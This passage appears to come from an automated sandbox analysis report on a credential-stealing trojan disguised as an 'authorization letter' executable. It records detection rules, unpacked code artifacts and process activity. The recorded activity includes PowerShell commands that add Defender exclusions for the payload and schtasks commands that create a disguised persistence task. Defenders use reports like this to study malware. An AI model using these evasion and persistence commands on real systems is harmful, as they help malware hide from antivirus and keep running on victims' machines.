                      Source: autorization Letter.exe, 00000001.00000002.2160081111.0000000004693000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs autorization Letter.exe
                      Source: autorization Letter.exe, 00000001.00000002.2157399976.00000000016CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs autorization Letter.exe
                      Source: autorization Letter.exe, 00000001.00000002.2163332817.0000000007860000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs autorization Letter.exe
                      Source: autorization Letter.exeBinary or memory string: OriginalFilenamePkJS.exe0 vs autorization Letter.exe
                      Source: autorization Letter.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.autorization Letter.exe.44b1598.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 1.2.autorization Letter.exe.44b1598.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: autorization Letter.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: tIFjYTCo.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, cPs8D.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 72CF8egH.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, G5CXsdn.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 3uPsILA6U.csCryptographic APIs: 'CreateDecryptor'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 6oQOw74dfIt.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, aMIWm.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.44ec5b8.2.raw.unpack, 3QjbQ514BDx.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, lSFA8pMlGZmCox3ZBB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.AddAccessRule
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, lSFA8pMlGZmCox3ZBB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.SetAccessControl
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csSecurity API names: _0020.AddAccessRule
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@23/19@1/1
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile created: C:\Users\user\AppData\Roaming\tIFjYTCo.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeMutant created: NULL
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeMutant created: \Sessions\1\BaseNamedObjects\hxHNKsIkb
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3040:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1016:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3620:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1788:120:WilError_03
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile created: C:\Users\user\AppData\Local\Temp\tmpF639.tmpJump to behavior
                      Source: autorization Letter.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: autorization Letter.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: tIFjYTCo.exe.1.drBinary or memory string: INSERT INTO Product(Id, Name, Units, Price, CategoryId)VALUES (@id, @name, @units, @price, @idcat); SELECT last_insert_rowid()
                      Source: autorization Letter.exeReversingLabs: Detection: 57%
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile read: C:\Users\user\Desktop\autorization Letter.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\autorization Letter.exe "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\tIFjYTCo.exe C:\Users\user\AppData\Roaming\tIFjYTCo.exe
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe "C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe"
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\autorization Letter.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\tIFjYTCo.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmp1162.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: dwrite.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
